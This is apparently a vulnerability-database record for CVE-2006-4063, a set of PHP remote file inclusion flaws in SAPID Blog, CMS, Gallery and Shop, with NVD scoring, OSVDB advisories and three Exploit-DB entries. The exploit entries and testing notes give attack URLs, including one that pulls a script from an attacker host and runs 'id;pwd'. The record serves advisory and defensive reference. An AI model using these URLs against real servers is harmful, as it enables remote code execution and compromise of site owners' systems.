ID CVE-2006-4063Type cveReporter cve@mitre.orgModified 2017-10-19T01:29:00
Description
Multiple PHP remote file inclusion vulnerabilities in Csaba Godor SAPID Blog Beta 2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) root_path parameter to (a) usr/extensions/get_blog_infochannel.inc.php, (b) usr/extensions/get_blog_meta_info.inc.php, or (c) usr/extensions/get_infochannel.inc.php; or the (2) GLOBALS[root_path] parameter to (d) usr/extensions/get_tree.inc.php.
{"id": "CVE-2006-4063", "bulletinFamily": "NVD", "title": "CVE-2006-4063", "description": "Multiple PHP remote file inclusion vulnerabilities in Csaba Godor SAPID Blog Beta 2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) root_path parameter to (a) usr/extensions/get_blog_infochannel.inc.php, (b) usr/extensions/get_blog_meta_info.inc.php, or (c) usr/extensions/get_infochannel.inc.php; or the (2) GLOBALS[root_path] parameter to (d) usr/extensions/get_tree.inc.php.", "published": "2006-08-10T00:04:00", "modified": "2017-10-19T01:29:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4063", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/2129", "https://exchange.xforce.ibmcloud.com/vulnerabilities/28251", "http://www.vupen.com/english/advisories/2006/3196"], "cvelist": ["CVE-2006-4063"], "type": "cve", "lastseen": "2020-10-03T11:48:17", "edition": 3, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:27831", "OSVDB:27828", "OSVDB:27830"]}, {"type": "exploitdb", "idList": ["EDB-ID:2131", "EDB-ID:2128", "EDB-ID:2130", "EDB-ID:2129"]}], "modified": "2020-10-03T11:48:17", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2020-10-03T11:48:17", "rev": 2}, "vulnersScore": 7.1}, "cpe": ["cpe:/a:csaba_godor:sapid_blog_beta_2:initial"], "affectedSoftware": [{"cpeName": "csaba_godor:sapid_blog_beta_2", "name": "csaba godor sapid blog beta 2", "operator": "eq", "version": "initial"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:csaba_godor:sapid_blog_beta_2:initial:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:csaba_godor:sapid_blog_beta_2:initial:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"osvdb": [{"lastseen": "2017-04-28T13:20:24", "bulletinFamily": "software", "cvelist": ["CVE-2006-4065", "CVE-2006-4063"], "edition": 1, "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Manual Testing Notes\nhttp://[target]/[sapidgalery_path]/usr/extensions/get_calendar.inc.php?root_path=[evil_scripts]\n## References:\n[Secunia Advisory ID:21413](https://secuniaresearch.flexerasoftware.com/advisories/21413/)\n[Related OSVDB ID: 27832](https://vulners.com/osvdb/OSVDB:27832)\nISS X-Force ID: 28254\nGeneric Exploit URL: http://milw0rm.com/exploits/2130\nFrSIRT Advisory: ADV-2006-3197\nFrSIRT Advisory: ADV-2006-3196\n[CVE-2006-4065](https://vulners.com/cve/CVE-2006-4065)\n[CVE-2006-4063](https://vulners.com/cve/CVE-2006-4063)\n", "modified": "2006-08-07T09:20:09", "published": "2006-08-07T09:20:09", "href": "https://vulners.com/osvdb/OSVDB:27831", "id": "OSVDB:27831", "title": "SAPID Gallery get_calendar.inc.php root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:24", "bulletinFamily": "software", "cvelist": ["CVE-2006-4062", "CVE-2006-4063"], "edition": 1, "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Manual Testing Notes\nhttp://[target]/[sapidshop_path]/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[evil_scripts]\n## References:\n[Secunia Advisory ID:21414](https://secuniaresearch.flexerasoftware.com/advisories/21414/)\nISS X-Force ID: 28255\nGeneric Exploit URL: http://milw0rm.com/exploits/2131\nFrSIRT Advisory: ADV-2006-3198\nFrSIRT Advisory: ADV-2006-3196\n[CVE-2006-4062](https://vulners.com/cve/CVE-2006-4062)\n[CVE-2006-4063](https://vulners.com/cve/CVE-2006-4063)\n", "modified": "2006-08-07T09:35:12", "published": "2006-08-07T09:35:12", "href": "https://vulners.com/osvdb/OSVDB:27830", "id": "OSVDB:27830", "title": "SAPID Shop get_tree.inc.php GLOBALS[root_path] Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:24", "bulletinFamily": "software", "cvelist": ["CVE-2006-4026", "CVE-2006-4063"], "edition": 1, "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Manual Testing Notes\nhttp://[target]/usr/extensions/get_infochannel.inc.php?root_path=http://[attacker]/cmd.txt?cmd=id;pwd\n## References:\nVendor URL: http://sapid.sourceforge.net/\n[Secunia Advisory ID:21410](https://secuniaresearch.flexerasoftware.com/advisories/21410/)\n[Related OSVDB ID: 27829](https://vulners.com/osvdb/OSVDB:27829)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0103.html\nISS X-Force ID: 28250\nFrSIRT Advisory: ADV-2006-3191\nFrSIRT Advisory: ADV-2006-3196\n[CVE-2006-4026](https://vulners.com/cve/CVE-2006-4026)\n[CVE-2006-4063](https://vulners.com/cve/CVE-2006-4063)\nBugtraq ID: 19383\n", "modified": "2006-08-07T06:50:16", "published": "2006-08-07T06:50:16", "href": "https://vulners.com/osvdb/OSVDB:27828", "id": "OSVDB:27828", "title": "SAPID CMS get_infochannel.inc.php root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T15:34:53", "description": "SAPID CMS <= 1.2.3.05 (root_path) Remote File Include Vulnerabilities. CVE-2006-4026,CVE-2006-4063. Webapps exploit for php platform", "published": "2006-08-07T00:00:00", "type": "exploitdb", "title": "SAPID CMS <= 1.2.3.05 root_path Remote File Include Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4026", "CVE-2006-4063"], "modified": "2006-08-07T00:00:00", "id": "EDB-ID:2128", "href": "https://www.exploit-db.com/exploits/2128/", "sourceData": "$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$\n$$\n$$ SAPID CMS <= v. 1.2.3.05 (root_path) Remote File Include Vulnerability\n$$ Script site: http://sapid.sourceforge.net/\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n$$\n$$ Find by: Kacper (a.k.a Rahim)\n$$\n$$ Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n$$\n$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,\n$$ Adam, DeathSpeed, Drzewko, pepi\n$$\n$$ Specjal greetz: DragonHeart ;-)\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n\nExpl:\n\nhttp://www.site.com/[sapidcms_path]/usr/extensions/get_infochannel.inc.php?root_path=[evil_scripts]\n\nhttp://www.site.com/[sapidcms_path]/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[evil_scripts]\n\n\n#Pozdro dla wszystkich ;-)\n\n# milw0rm.com [2006-08-07]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2128/"}, {"lastseen": "2016-01-31T15:35:07", "description": "SAPID Gallery <= 1.0 (root_path) Remote File Include Vulnerabilities. CVE-2006-4063,CVE-2006-4065. Webapps exploit for php platform", "published": "2006-08-07T00:00:00", "type": "exploitdb", "title": "SAPID Gallery <= 1.0 root_path Remote File Include Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4065", "CVE-2006-4063"], "modified": "2006-08-07T00:00:00", "id": "EDB-ID:2130", "href": "https://www.exploit-db.com/exploits/2130/", "sourceData": "$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$\n$$\n$$ SAPID Gallery <= v.1 (root_path) Remote File Include Vulnerability\n$$ Script site: http://sapid.sourceforge.net/\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n$$\n$$ Find by: Kacper (a.k.a Rahim)\n$$\n$$ Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n$$\n$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,\n$$ Adam, DeathSpeed, Drzewko, pepi\n$$\n$$ Specjal greetz: DragonHeart ;-)\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n\nExpl:\n\nhttp://www.site.com/[sapidgalery_path]/usr/extensions/get_calendar.inc.php?root_path=[evil_scripts]\n\nhttp://www.site.com/[sapidgalery_path]/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[evil_scripts]\n\n\n#Pozdro dla wszystkich ;-)\n\n# milw0rm.com [2006-08-07]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2130/"}, {"lastseen": "2016-01-31T15:35:14", "description": "SAPID Shop <= 1.2 (root_path) Remote File Include Vulnerability. CVE-2006-4062,CVE-2006-4063. Webapps exploit for php platform", "published": "2006-08-07T00:00:00", "type": "exploitdb", "title": "SAPID Shop <= 1.2 root_path Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4062", "CVE-2006-4063"], "modified": "2006-08-07T00:00:00", "id": "EDB-ID:2131", "href": "https://www.exploit-db.com/exploits/2131/", "sourceData": "$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$\n$$\n$$ SAPID Shop <= v.1.2 (root_path) Remote File Include Vulnerability\n$$ Script site: http://sapid.sourceforge.net/\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n$$\n$$ Find by: Kacper (a.k.a Rahim)\n$$\n$$ Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n$$\n$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,\n$$ Adam, DeathSpeed, Drzewko, pepi\n$$\n$$ Specjal greetz: DragonHeart ;-)\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n\nExpl:\n\nhttp://www.site.com/[sapidshop_path]/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[evil_scripts]\n\n#Pozdro dla wszystkich ;-)\n\n# milw0rm.com [2006-08-07]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2131/"}]}
